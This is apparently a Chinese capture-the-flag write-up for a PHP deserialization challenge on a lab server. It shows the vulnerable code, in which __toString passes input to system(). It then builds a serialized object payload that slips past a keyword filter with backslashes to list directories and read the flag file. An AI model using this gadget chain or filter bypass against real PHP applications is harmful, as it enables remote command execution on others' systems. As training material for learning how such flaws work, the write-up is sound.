cs反序列化1
http://111.229.84.70:9997/
参考:https://www.cnblogs.com/Jim2g/articles/13641685.html
llinux命令:https://wenwen.sogou.com/z/q797390881.htm?rcer=g9PEmO6OUhz-HfDog
<?php
error_reporting(0);
highlight_file(__FILE__);
class Person{
public $username='peguin';
public $password='123456';
public $file;
public function __construct($username,$password)
{
$this->username = $username;
$this->password = $password;
}
public function __destruct()
{
// TODO: Implement __destruct() method.
echo "your file is ".$this->file;
}
}
class Human{
public $a;
public function __construct($a){
$this->a = $a;
}
public function __toString()
{
if(preg_match('/ls|cat|more|flag/i',$this->a)){
// TODO: Implement __toString() method.
die('姿势骚一点');
}
else{
system($this->a);
}
return ("good");
}
}
$a = $_GET['code'];
unserialize($a);
?>
关键在system,所以要改变a的值
$a要反序列化
正则匹配的用\绕过
<?php
class Person{
public $username='peguin';
public $password='123456';
public $file;
}
class Human{
public $a;
}
$n=new person();
$n->file=new human();
$n->file->a='l\s ../../../../';
$c=serialize($n);
echo $c;
run:O:6:"Person":3:{s:8:"username";s:6:"peguin";s:8:"password";s:6:"123456";s:4:"file";O:5:"Human":1:{s:1:"a";s:16:"l\s ../../../../";}}
bin boot dev etc flag home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
根目录下有个flag文件
$n->file->a='ca\t /f\lag';